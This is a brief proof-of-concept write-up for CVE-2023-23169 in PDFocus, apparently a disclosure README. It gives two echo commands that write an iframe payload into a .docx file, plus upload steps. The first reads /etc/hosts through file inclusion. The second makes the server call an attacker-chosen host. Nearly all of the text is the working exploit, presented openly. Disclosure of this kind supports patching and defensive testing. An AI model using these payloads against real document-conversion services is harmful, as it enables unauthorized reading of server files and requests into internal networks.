POC for CVE-2023-23169 Local File inclusion & Server side request Forgery
Local File Incusion :
echo "<iframe src=file://etc/hosts></iframe>" > poc.docx
- Upload the file in PDFocus services
- View/Download file after to triggered POC
SSRF :
echo "<iframe src=http://your-server></iframe>" > poc.docx
- Upload the file in PDFocus services
- View/Download file to see triggered POC